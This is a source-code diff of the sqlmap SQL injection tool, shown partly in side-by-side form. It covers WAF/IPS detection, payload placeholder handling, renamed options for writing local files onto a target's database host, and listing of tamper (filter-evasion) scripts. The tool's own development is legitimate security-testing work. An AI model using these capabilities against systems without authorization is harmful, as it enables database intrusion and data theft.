warnMsg += "is protected by some kind of WAF/IPS/IDS" warnMsg += "is protected by some kind of WAF/IPS"
logger.critical(warnMsg) logger.critical(warnMsg)
return _ return _
@@ -1343,7 +1340,7 @@ def checkWaf():
return None return None
infoMsg = "checking if the target is protected by " infoMsg = "checking if the target is protected by "
infoMsg += "some kind of WAF/IPS/IDS" infoMsg += "some kind of WAF/IPS"
logger.info(infoMsg) logger.info(infoMsg)
retVal = False retVal = False
@@ -1357,7 +1354,10 @@ def checkWaf():
value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER value = "" if not conf.parameters.get(PLACE.GET) else conf.parameters[PLACE.GET] + DEFAULT_GET_POST_DELIMITER
value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload)) value += "%s=%s" % (randomStr(), agent.addPayloadDelimiters(payload))
pushValue(kb.redirectChoice)
pushValue(conf.timeout) pushValue(conf.timeout)
kb.redirectChoice = REDIRECTION.YES
conf.timeout = IDS_WAF_CHECK_TIMEOUT conf.timeout = IDS_WAF_CHECK_TIMEOUT
try: try:
@@ -1366,16 +1366,18 @@ def checkWaf():
retVal = True retVal = True
finally: finally:
kb.matchRatio = None kb.matchRatio = None
conf.timeout = popValue() conf.timeout = popValue()
kb.redirectChoice = popValue()
if retVal: if retVal:
warnMsg = "heuristics detected that the target " warnMsg = "heuristics detected that the target "
warnMsg += "is protected by some kind of WAF/IPS/IDS" warnMsg += "is protected by some kind of WAF/IPS"
logger.critical(warnMsg) logger.critical(warnMsg)
if not conf.identifyWaf: if not conf.identifyWaf:
message = "do you want sqlmap to try to detect backend " message = "do you want sqlmap to try to detect backend "
message += "WAF/IPS/IDS? [y/N] " message += "WAF/IPS? [y/N] "
if readInput(message, default='N', boolean=True): if readInput(message, default='N', boolean=True):
conf.identifyWaf = True conf.identifyWaf = True
@@ -1399,7 +1401,7 @@ def identifyWaf():
kb.testMode = True kb.testMode = True
infoMsg = "using WAF scripts to detect " infoMsg = "using WAF scripts to detect "
infoMsg += "backend WAF/IPS/IDS protection" infoMsg += "backend WAF/IPS protection"
logger.info(infoMsg) logger.info(infoMsg)
@cachedmethod @cachedmethod
@@ -1426,7 +1428,7 @@ def identifyWaf():
continue continue
try: try:
logger.debug("checking for WAF/IPS/IDS product '%s'" % product) logger.debug("checking for WAF/IPS product '%s'" % product)
found = function(_) found = function(_)
except Exception, ex: except Exception, ex:
errMsg = "exception occurred while running " errMsg = "exception occurred while running "
@@ -1436,19 +1438,19 @@ def identifyWaf():
found = False found = False
if found: if found:
errMsg = "WAF/IPS/IDS identified as '%s'" % product errMsg = "WAF/IPS identified as '%s'" % product
logger.critical(errMsg) logger.critical(errMsg)
retVal.append(product) retVal.append(product)
if retVal: if retVal:
if kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower(): if kb.wafSpecificResponse and "You don't have permission to access" not in kb.wafSpecificResponse and len(retVal) == 1 and "unknown" in retVal[0].lower():
handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE) handle, filename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.SPECIFIC_RESPONSE)
os.close(handle) os.close(handle)
with openFile(filename, "w+b") as f: with openFile(filename, "w+b") as f:
f.write(kb.wafSpecificResponse) f.write(kb.wafSpecificResponse)
message = "WAF/IPS/IDS specific response can be found in '%s'. " % filename message = "WAF/IPS specific response can be found in '%s'. " % filename
message += "If you know the details on used protection please " message += "If you know the details on used protection please "
message += "report it along with specific response " message += "report it along with specific response "
message += "to '%s'" % DEV_EMAIL_ADDRESS message += "to '%s'" % DEV_EMAIL_ADDRESS
@@ -1465,7 +1467,7 @@ def identifyWaf():
if not choice: if not choice:
raise SqlmapUserQuitException raise SqlmapUserQuitException
else: else:
warnMsg = "WAF/IPS/IDS product hasn't been identified" warnMsg = "WAF/IPS product hasn't been identified"
logger.warn(warnMsg) logger.warn(warnMsg)
kb.testType = None kb.testType = None
@@ -1547,6 +1549,10 @@ def checkConnection(suppressOutput=False):
kb.errorIsNone = False kb.errorIsNone = False
if any(_ in (kb.serverHeader or "") for _ in PRECONNECT_INCOMPATIBLE_SERVERS):
singleTimeWarnMessage("turning off pre-connect mechanism because of incompatible server ('%s')" % kb.serverHeader)
conf.disablePrecon = True
if not kb.originalPage and wasLastResponseHTTPError(): if not kb.originalPage and wasLastResponseHTTPError():
errMsg = "unable to retrieve page content" errMsg = "unable to retrieve page content"
raise SqlmapConnectionException(errMsg) raise SqlmapConnectionException(errMsg)

View File

@@ -311,9 +311,12 @@ class Agent(object):
for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)): for _ in set(re.findall(r"(?i)\[RANDSTR(?:\d+)?\]", payload)):
payload = payload.replace(_, randomStr()) payload = payload.replace(_, randomStr())
if origValue is not None and "[ORIGVALUE]" in payload: if origValue is not None:
origValue = getUnicode(origValue) origValue = getUnicode(origValue)
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue)) if "[ORIGVALUE]" in payload:
payload = getUnicode(payload).replace("[ORIGVALUE]", origValue if origValue.isdigit() else unescaper.escape("'%s'" % origValue))
if "[ORIGINAL]" in payload:
payload = getUnicode(payload).replace("[ORIGINAL]", origValue)
if INFERENCE_MARKER in payload: if INFERENCE_MARKER in payload:
if Backend.getIdentifiedDbms() is not None: if Backend.getIdentifiedDbms() is not None:

View File

@@ -126,7 +126,7 @@ class BigArray(list):
try: try:
with open(self.chunks[index], "rb") as f: with open(self.chunks[index], "rb") as f:
self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False) self.cache = Cache(index, pickle.loads(bz2.decompress(f.read())), False)
except IOError, ex: except Exception, ex:
errMsg = "exception occurred while retrieving data " errMsg = "exception occurred while retrieving data "
errMsg += "from a temporary file ('%s')" % ex.message errMsg += "from a temporary file ('%s')" % ex.message
raise SqlmapSystemException(errMsg) raise SqlmapSystemException(errMsg)

View File

@@ -165,6 +165,7 @@ from lib.core.settings import URI_QUESTION_MARKER
from lib.core.settings import URLENCODE_CHAR_LIMIT from lib.core.settings import URLENCODE_CHAR_LIMIT
from lib.core.settings import URLENCODE_FAILSAFE_CHARS from lib.core.settings import URLENCODE_FAILSAFE_CHARS
from lib.core.settings import USER_AGENT_ALIASES from lib.core.settings import USER_AGENT_ALIASES
from lib.core.settings import VERSION
from lib.core.settings import VERSION_STRING from lib.core.settings import VERSION_STRING
from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.settings import WEBSCARAB_SPLITTER
from lib.core.threads import getCurrentThreadData from lib.core.threads import getCurrentThreadData
@@ -868,11 +869,11 @@ def boldifyMessage(message):
retVal = message retVal = message
if any(_ in message for _ in BOLD_PATTERNS): if any(_ in message for _ in BOLD_PATTERNS):
retVal = setColor(message, True) retVal = setColor(message, bold=True)
return retVal return retVal
def setColor(message, bold=False): def setColor(message, color=None, bold=False):
retVal = message retVal = message
level = extractRegexResult(r"\[(?P<result>%s)\]" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message) or kb.get("stickyLevel") level = extractRegexResult(r"\[(?P<result>%s)\]" % '|'.join(_[0] for _ in getPublicTypeMembers(LOGGING_LEVELS)), message) or kb.get("stickyLevel")
@@ -880,15 +881,11 @@ def setColor(message, bold=False):
level = unicodeencode(level) level = unicodeencode(level)
if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler if message and getattr(LOGGER_HANDLER, "is_tty", False): # colorizing handler
if bold: if bold or color:
retVal = colored(message, color=None, on_color=None, attrs=("bold",)) retVal = colored(message, color=color, on_color=None, attrs=("bold",) if bold else None)
elif level: elif level:
level = getattr(logging, level, None) if isinstance(level, basestring) else level level = getattr(logging, level, None) if isinstance(level, basestring) else level
_ = LOGGER_HANDLER.level_map.get(level) retVal = LOGGER_HANDLER.colorize(message, level)
if _:
background, foreground, bold = _
retVal = colored(message, color=foreground, on_color="on_%s" % background if background else None, attrs=("bold",) if bold else None)
kb.stickyLevel = level if message and message[-1] != "\n" else None kb.stickyLevel = level if message and message[-1] != "\n" else None
return retVal return retVal
@@ -929,7 +926,7 @@ def dataToStdout(data, forceOutput=False, bold=False, content_type=None, status=
if conf.get("api"): if conf.get("api"):
sys.stdout.write(message, status, content_type) sys.stdout.write(message, status, content_type)
else: else:
sys.stdout.write(setColor(message, bold)) sys.stdout.write(setColor(message, bold=bold))
sys.stdout.flush() sys.stdout.flush()
except IOError: except IOError:
@@ -1013,6 +1010,9 @@ def readInput(message, default=None, checkBatch=True, boolean=False):
kb.prependFlag = False kb.prependFlag = False
if conf.get("answers"): if conf.get("answers"):
if not any(_ in conf.answers for _ in ",="):
return conf.answers
for item in conf.answers.split(','): for item in conf.answers.split(','):
question = item.split('=')[0].strip() question = item.split('=')[0].strip()
answer = item.split('=')[1] if len(item.split('=')) > 1 else None answer = item.split('=')[1] if len(item.split('=')) > 1 else None
@@ -1166,6 +1166,9 @@ def getHeader(headers, key):
def checkFile(filename, raiseOnError=True): def checkFile(filename, raiseOnError=True):
""" """
Checks for file existence and readability Checks for file existence and readability
>>> checkFile(__file__)
True
""" """
valid = True valid = True
@@ -1176,7 +1179,7 @@ def checkFile(filename, raiseOnError=True):
try: try:
if filename is None or not os.path.isfile(filename): if filename is None or not os.path.isfile(filename):
valid = False valid = False
except UnicodeError: except:
valid = False valid = False
if valid: if valid:
@@ -1301,7 +1304,7 @@ def setPaths(rootPath):
paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml") paths.PGSQL_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "postgresql.xml")
for path in paths.values(): for path in paths.values():
if any(path.endswith(_) for _ in (".txt", ".xml", ".zip")): if any(path.endswith(_) for _ in (".md5", ".txt", ".xml", ".zip")):
checkFile(path) checkFile(path)
def weAreFrozen(): def weAreFrozen():
@@ -1321,8 +1324,6 @@ def parseTargetDirect():
if not conf.direct: if not conf.direct:
return return
conf.direct = conf.direct.encode(UNICODE_ENCODING) # some DBMS connectors (e.g. pymssql) don't like Unicode with non-US letters
details = None details = None
remote = False remote = False
@@ -1353,7 +1354,7 @@ def parseTargetDirect():
conf.hostname = "localhost" conf.hostname = "localhost"
conf.port = 0 conf.port = 0
conf.dbmsDb = details.group("db") conf.dbmsDb = details.group("db").strip() if details.group("db") is not None else None
conf.parameters[None] = "direct connection" conf.parameters[None] = "direct connection"
break break
@@ -1433,7 +1434,7 @@ def parseTargetUrl():
errMsg += "on this platform" errMsg += "on this platform"
raise SqlmapGenericException(errMsg) raise SqlmapGenericException(errMsg)
if not re.search(r"^http[s]*://", conf.url, re.I) and not re.search(r"^ws[s]*://", conf.url, re.I): if not re.search(r"^https?://", conf.url, re.I) and not re.search(r"^wss?://", conf.url, re.I):
if re.search(r":443\b", conf.url): if re.search(r":443\b", conf.url):
conf.url = "https://%s" % conf.url conf.url = "https://%s" % conf.url
else: else:
@@ -1534,14 +1535,14 @@ def expandAsteriskForColumns(expression):
the SQL query string (expression) the SQL query string (expression)
""" """
asterisk = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression) match = re.search(r"(?i)\ASELECT(\s+TOP\s+[\d]+)?\s+\*\s+FROM\s+`?([^`\s()]+)", expression)
if asterisk: if match:
infoMsg = "you did not provide the fields in your query. " infoMsg = "you did not provide the fields in your query. "
infoMsg += "sqlmap will retrieve the column names itself" infoMsg += "sqlmap will retrieve the column names itself"
logger.info(infoMsg) logger.info(infoMsg)
_ = asterisk.group(2).replace("..", '.').replace(".dbo.", '.') _ = match.group(2).replace("..", '.').replace(".dbo.", '.')
db, conf.tbl = _.split('.', 1) if '.' in _ else (None, _) db, conf.tbl = _.split('.', 1) if '.' in _ else (None, _)
if db is None: if db is None:
@@ -1650,6 +1651,9 @@ def parseUnionPage(page):
def parseFilePaths(page): def parseFilePaths(page):
""" """
Detects (possible) absolute system paths inside the provided page content Detects (possible) absolute system paths inside the provided page content
>>> _ = "/var/www/html/index.php"; parseFilePaths("<html>Error occurred at line 207 of: %s<br>Please contact your administrator</html>" % _); _ in kb.absFilePaths
True
""" """
if page: if page:
@@ -2042,6 +2046,9 @@ def parseXmlFile(xmlFile, handler):
def getSQLSnippet(dbms, sfile, **variables): def getSQLSnippet(dbms, sfile, **variables):
""" """
Returns content of SQL snippet located inside 'procs/' directory Returns content of SQL snippet located inside 'procs/' directory
>>> 'RECONFIGURE' in getSQLSnippet(DBMS.MSSQL, "activate_sp_oacreate")
True
""" """
if sfile.endswith('.sql') and os.path.exists(sfile): if sfile.endswith('.sql') and os.path.exists(sfile):
@@ -2081,9 +2088,12 @@ def getSQLSnippet(dbms, sfile, **variables):
return retVal return retVal
def readCachedFileContent(filename, mode='rb'): def readCachedFileContent(filename, mode="rb"):
""" """
Cached reading of file content (avoiding multiple same file reading) Cached reading of file content (avoiding multiple same file reading)
>>> "readCachedFileContent" in readCachedFileContent(__file__)
True
""" """
if filename not in kb.cache.content: if filename not in kb.cache.content:
@@ -2140,6 +2150,9 @@ def average(values):
def calculateDeltaSeconds(start): def calculateDeltaSeconds(start):
""" """
Returns elapsed time from start till now Returns elapsed time from start till now
>>> calculateDeltaSeconds(0) > 1151721660
True
""" """
return time.time() - start return time.time() - start
@@ -2147,6 +2160,9 @@ def calculateDeltaSeconds(start):
def initCommonOutputs(): def initCommonOutputs():
""" """
Initializes dictionary containing common output values used by "good samaritan" feature Initializes dictionary containing common output values used by "good samaritan" feature
>>> initCommonOutputs(); "information_schema" in kb.commonOutputs["Databases"]
True
""" """
kb.commonOutputs = {} kb.commonOutputs = {}
@@ -2914,15 +2930,15 @@ def filterStringValue(value, charRegex, replacement=""):
return retVal return retVal
def filterControlChars(value): def filterControlChars(value, replacement=' '):
""" """
Returns string value with control chars being supstituted with ' ' Returns string value with control chars being supstituted with replacement character
>>> filterControlChars(u'AND 1>(2+3)\\n--') >>> filterControlChars(u'AND 1>(2+3)\\n--')
u'AND 1>(2+3) --' u'AND 1>(2+3) --'
""" """
return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ') return filterStringValue(value, PRINTABLE_CHAR_REGEX, replacement)
def isDBMSVersionAtLeast(version): def isDBMSVersionAtLeast(version):
""" """
@@ -3351,6 +3367,25 @@ def unhandledExceptionMessage():
return errMsg return errMsg
def getLatestRevision():
"""
Retrieves latest revision from the offical repository
>>> getLatestRevision() == VERSION
True
"""
retVal = None
req = urllib2.Request(url="https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/lib/core/settings.py")
try:
content = urllib2.urlopen(req).read()
retVal = extractRegexResult(r"VERSION\s*=\s*[\"'](?P<result>[\d.]+)", content)
except:
pass
return retVal
def createGithubIssue(errMsg, excMsg): def createGithubIssue(errMsg, excMsg):
""" """
Automatically create a Github issue with unhandled exception information Automatically create a Github issue with unhandled exception information
@@ -3444,8 +3479,7 @@ def maskSensitiveData(msg):
retVal = retVal.replace(value, '*' * len(value)) retVal = retVal.replace(value, '*' * len(value))
# Just in case (for problematic parameters regarding user encoding) # Just in case (for problematic parameters regarding user encoding)
match = re.search(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)( -?-[a-z]|\Z)", retVal) for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal):
if match:
retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) retVal = retVal.replace(match.group(3), '*' * len(match.group(3)))
if getpass.getuser(): if getpass.getuser():
@@ -3753,7 +3787,7 @@ def expandMnemonics(mnemonics, parser, args):
logger.debug(debugMsg) logger.debug(debugMsg)
else: else:
found = sorted(options.keys(), key=lambda x: len(x))[0] found = sorted(options.keys(), key=lambda x: len(x))[0]
warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys())) warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to any of: %s). " % (name, ", ".join("'%s'" % key for key in options.keys()))
warnMsg += "Resolved to shortest of those ('%s')" % found warnMsg += "Resolved to shortest of those ('%s')" % found
logger.warn(warnMsg) logger.warn(warnMsg)
@@ -4137,6 +4171,9 @@ def checkSystemEncoding():
def evaluateCode(code, variables=None): def evaluateCode(code, variables=None):
""" """
Executes given python code given in a string form Executes given python code given in a string form
>>> _ = {}; evaluateCode("a = 1; b = 2; c = a", _); _["c"]
1
""" """
try: try:
@@ -4190,6 +4227,9 @@ def incrementCounter(technique):
def getCounter(technique): def getCounter(technique):
""" """
Returns query counter for a given technique Returns query counter for a given technique
>>> resetCounter(PAYLOAD.TECHNIQUE.STACKED); incrementCounter(PAYLOAD.TECHNIQUE.STACKED); getCounter(PAYLOAD.TECHNIQUE.STACKED)
1
""" """
return kb.counters.get(technique, 0) return kb.counters.get(technique, 0)
@@ -4275,9 +4315,11 @@ def extractExpectedValue(value, expected):
value = value.strip().lower() value = value.strip().lower()
if value in ("true", "false"): if value in ("true", "false"):
value = value == "true" value = value == "true"
elif value in ('t', 'f'):
value = value == 't'
elif value in ("1", "-1"): elif value in ("1", "-1"):
value = True value = True
elif value == "0": elif value == '0':
value = False value = False
else: else:
value = None value = None
@@ -4427,6 +4469,9 @@ def zeroDepthSearch(expression, value):
""" """
Searches occurrences of value inside expression at 0-depth level Searches occurrences of value inside expression at 0-depth level
regarding the parentheses regarding the parentheses
>>> _ = "SELECT (SELECT id FROM users WHERE 2>1) AS result FROM DUAL"; _[zeroDepthSearch(_, "FROM")[0]:]
'FROM DUAL'
""" """
retVal = [] retVal = []
@@ -4462,7 +4507,7 @@ def pollProcess(process, suppress_errors=False):
Checks for process status (prints . if still running) Checks for process status (prints . if still running)
""" """
while True: while process:
dataToStdout(".") dataToStdout(".")
time.sleep(1) time.sleep(1)
@@ -4687,7 +4732,38 @@ def getSafeExString(ex, encoding=None):
return getUnicode(retVal or "", encoding=encoding).strip() return getUnicode(retVal or "", encoding=encoding).strip()
def safeVariableNaming(value): def safeVariableNaming(value):
"""
Returns escaped safe-representation of a given variable name that can be used in Python evaluated code
>>> safeVariableNaming("foo bar")
'foo__SAFE__20bar'
"""
return re.sub(r"[^\w]", lambda match: "%s%02x" % (SAFE_VARIABLE_MARKER, ord(match.group(0))), value) return re.sub(r"[^\w]", lambda match: "%s%02x" % (SAFE_VARIABLE_MARKER, ord(match.group(0))), value)
def unsafeVariableNaming(value): def unsafeVariableNaming(value):
"""
Returns unescaped safe-representation of a given variable name
>>> unsafeVariableNaming("foo__SAFE__20bar")
'foo bar'
"""
return re.sub(r"%s([0-9a-f]{2})" % SAFE_VARIABLE_MARKER, lambda match: match.group(1).decode("hex"), value) return re.sub(r"%s([0-9a-f]{2})" % SAFE_VARIABLE_MARKER, lambda match: match.group(1).decode("hex"), value)
def firstNotNone(*args):
"""
Returns first not-None value from a given list of arguments
>>> firstNotNone(None, None, 1, 2, 3)
1
"""
retVal = None
for _ in args:
if _ is not None:
retVal = _
break
return retVal

View File

@@ -263,6 +263,10 @@ SQL_STATEMENTS = {
"commit ", "commit ",
"rollback ", "rollback ",
), ),
"SQL administration": (
"set ",
),
} }
POST_HINT_CONTENT_TYPES = { POST_HINT_CONTENT_TYPES = {

View File

@@ -47,6 +47,7 @@ from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
from lib.core.settings import TRIM_STDOUT_DUMP_SIZE from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT from lib.core.settings import UNSAFE_DUMP_FILEPATH_REPLACEMENT
from lib.core.settings import VERSION_STRING
from lib.core.settings import WINDOWS_RESERVED_NAMES from lib.core.settings import WINDOWS_RESERVED_NAMES
from thirdparty.magic import magic from thirdparty.magic import magic
@@ -532,6 +533,7 @@ class Dump(object):
elif conf.dumpFormat == DUMP_FORMAT.HTML: elif conf.dumpFormat == DUMP_FORMAT.HTML:
dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n") dataToDumpFile(dumpFP, "<!DOCTYPE html>\n<html>\n<head>\n")
dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING) dataToDumpFile(dumpFP, "<meta http-equiv=\"Content-type\" content=\"text/html;charset=%s\">\n" % UNICODE_ENCODING)
dataToDumpFile(dumpFP, "<meta name=\"generator\" content=\"%s\" />\n" % VERSION_STRING)
dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table))) dataToDumpFile(dumpFP, "<title>%s</title>\n" % ("%s%s" % ("%s." % db if METADB_SUFFIX not in db else "", table)))
dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE) dataToDumpFile(dumpFP, HTML_DUMP_CSS_STYLE)
dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n") dataToDumpFile(dumpFP, "\n</head>\n<body>\n<table>\n<thead>\n<tr>\n")

View File

@@ -256,6 +256,7 @@ class PAYLOAD:
3: "LIKE single quoted string", 3: "LIKE single quoted string",
4: "Double quoted string", 4: "Double quoted string",
5: "LIKE double quoted string", 5: "LIKE double quoted string",
6: "Identifier (e.g. column name)",
} }
RISK = { RISK = {
@@ -275,6 +276,7 @@ class PAYLOAD:
6: "TOP", 6: "TOP",
7: "Table name", 7: "Table name",
8: "Column name", 8: "Column name",
9: "Pre-WHERE (non-query)",
} }
class METHOD: class METHOD:

View File

@@ -54,6 +54,7 @@ from lib.core.common import resetCookieJar
from lib.core.common import runningAsAdmin from lib.core.common import runningAsAdmin
from lib.core.common import safeExpandUser from lib.core.common import safeExpandUser
from lib.core.common import saveConfig from lib.core.common import saveConfig
from lib.core.common import setColor
from lib.core.common import setOptimize from lib.core.common import setOptimize
from lib.core.common import setPaths from lib.core.common import setPaths
from lib.core.common import singleTimeWarnMessage from lib.core.common import singleTimeWarnMessage
@@ -607,22 +608,22 @@ def _setMetasploit():
raise SqlmapFilePathException(errMsg) raise SqlmapFilePathException(errMsg)
def _setWriteFile(): def _setWriteFile():
if not conf.wFile: if not conf.fileWrite:
return return
debugMsg = "setting the write file functionality" debugMsg = "setting the write file functionality"
logger.debug(debugMsg) logger.debug(debugMsg)
if not os.path.exists(conf.wFile): if not os.path.exists(conf.fileWrite):
errMsg = "the provided local file '%s' does not exist" % conf.wFile errMsg = "the provided local file '%s' does not exist" % conf.fileWrite
raise SqlmapFilePathException(errMsg) raise SqlmapFilePathException(errMsg)
if not conf.dFile: if not conf.fileDest:
errMsg = "you did not provide the back-end DBMS absolute path " errMsg = "you did not provide the back-end DBMS absolute path "
errMsg += "where you want to write the local file '%s'" % conf.wFile errMsg += "where you want to write the local file '%s'" % conf.fileWrite
raise SqlmapMissingMandatoryOptionException(errMsg) raise SqlmapMissingMandatoryOptionException(errMsg)
conf.wFileType = getFileType(conf.wFile) conf.fileWriteType = getFileType(conf.fileWrite)
def _setOS(): def _setOS():
""" """
@@ -699,6 +700,22 @@ def _setDBMS():
break break
def _listTamperingFunctions():
"""
Lists available tamper functions
"""
if conf.listTampers:
infoMsg = "listing available tamper scripts\n"
logger.info(infoMsg)
for script in sorted(glob.glob(os.path.join(paths.SQLMAP_TAMPER_PATH, "*.py"))):
content = openFile(script, "rb").read()
match = re.search(r'(?s)__priority__.+"""(.+)"""', content)
if match:
comment = match.group(1).strip()
dataToStdout("* %s - %s\n" % (setColor(os.path.basename(script), "yellow"), re.sub(r" *\n *", " ", comment.split("\n\n")[0].strip())))
def _setTamperingFunctions():
"""
Loads tampering functions from given script(s)
@@ -807,7 +824,7 @@ def _setTamperingFunctions():
def _setWafFunctions():
"""
- Loads WAF/IPS/IDS detecting functions from script(s)
+ Loads WAF/IPS detecting functions from script(s)
"""
if conf.identifyWaf:
@@ -1492,14 +1509,14 @@ def _cleanupOptions():
if conf.url:
conf.url = conf.url.strip()
- if conf.rFile:
+ if conf.fileRead:
- conf.rFile = ntToPosixSlashes(normalizePath(conf.rFile))
+ conf.fileRead = ntToPosixSlashes(normalizePath(conf.fileRead))
- if conf.wFile:
+ if conf.fileWrite:
- conf.wFile = ntToPosixSlashes(normalizePath(conf.wFile))
+ conf.fileWrite = ntToPosixSlashes(normalizePath(conf.fileWrite))
- if conf.dFile:
+ if conf.fileDest:
- conf.dFile = ntToPosixSlashes(normalizePath(conf.dFile))
+ conf.fileDest = ntToPosixSlashes(normalizePath(conf.fileDest))
if conf.sitemapUrl and not conf.sitemapUrl.lower().startswith("http"):
conf.sitemapUrl = "http%s://%s" % ('s' if conf.forceSSL else '', conf.sitemapUrl)
@@ -1682,7 +1699,7 @@ def _setConfAttributes():
conf.tests = []
conf.trafficFP = None
conf.HARCollectorFactory = None
- conf.wFileType = None
+ conf.fileWriteType = None
def _setKnowledgeBaseAttributes(flushAll=True):
"""
@@ -1696,6 +1713,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.absFilePaths = set()
kb.adjustTimeDelay = None
kb.alerted = False
kb.aliasName = randomStr()
kb.alwaysRefresh = None
kb.arch = None
kb.authHeader = None
@@ -1835,6 +1853,7 @@ def _setKnowledgeBaseAttributes(flushAll=True):
kb.safeCharEncode = False
kb.safeReq = AttribDict()
kb.secondReq = None
kb.serverHeader = None
kb.singleLogFlags = set()
kb.skipSeqMatcher = False
kb.reduceTests = None
@@ -2459,6 +2478,7 @@ def init():
_setDNSServer()
_adjustLoggingFormatter()
_setMultipleTargets()
_listTamperingFunctions()
_setTamperingFunctions()
_setWafFunctions()
_setTrafficOutputFP()

View File

@@ -165,9 +165,9 @@ optDict = {
},
"File system": {
- "rFile": "string",
+ "fileRead": "string",
- "wFile": "string",
+ "fileWrite": "string",
- "dFile": "string",
+ "fileDest": "string",
},
"Takeover": {
@@ -227,6 +227,7 @@ optDict = {
"disableColoring": "boolean", "disableColoring": "boolean",
"googlePage": "integer", "googlePage": "integer",
"identifyWaf": "boolean", "identifyWaf": "boolean",
"listTampers": "boolean",
"mobile": "boolean", "mobile": "boolean",
"offline": "boolean", "offline": "boolean",
"purge": "boolean", "purge": "boolean",

View File

@@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME
from lib.core.enums import OS
# sqlmap version (<major>.<minor>.<month>.<monthly commit>)
- VERSION = "1.2.7.0"
+ VERSION = "1.2.10.0"
TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE)
@@ -45,10 +45,10 @@ BANNER = """\033[01;33m\
DIFF_TOLERANCE = 0.05
CONSTANT_RATIO = 0.9
- # Ratio used in heuristic check for WAF/IPS/IDS protected targets
+ # Ratio used in heuristic check for WAF/IPS protected targets
IDS_WAF_CHECK_RATIO = 0.5
# Timeout used in heuristic check for WAF/IPS/IDS protected targets
IDS_WAF_CHECK_TIMEOUT = 10
# Lower and upper values for match ratio in case of stable page
@@ -97,6 +97,9 @@ MAX_CONSECUTIVE_CONNECTION_ERRORS = 15
# Timeout before the pre-connection candidate is being disposed (because of high probability that the web server will reset it)
PRECONNECT_CANDIDATE_TIMEOUT = 10
# Servers known to cause issue with pre-connection mechanism (because of lack of multi-threaded support)
PRECONNECT_INCOMPATIBLE_SERVERS = ("SimpleHTTP",)
# Maximum sleep time in "Murphy" (testing) mode
MAX_MURPHY_SLEEP_TIME = 3
@@ -321,6 +324,7 @@ FILE_PATH_REGEXES = (r"<b>(?P<result>[^<>]+?)</b> on line \d+", r"in (?P<result>
# Regular expressions used for parsing error messages (--parse-errors)
ERROR_PARSING_REGEXES = (
r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P<result>[^<]+)",
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
@@ -367,7 +371,7 @@ URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
- SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred")
+ SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred")
# Maximum number of threads (avoiding connection issues and/or DoS)
MAX_NUMBER_OF_THREADS = 10
@@ -406,7 +410,7 @@ REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
# Regular expression used for replacing non-alphanum characters
- REFLECTED_REPLACEMENT_REGEX = r".+"
+ REFLECTED_REPLACEMENT_REGEX = r"[^\n]{1,100}"
# Maximum time (in seconds) spent per reflective value(s) replacement
REFLECTED_REPLACEMENT_TIMEOUT = 3
@@ -426,6 +430,9 @@ DEFAULT_MSSQL_SCHEMA = "dbo"
# Display hash attack info every mod number of items
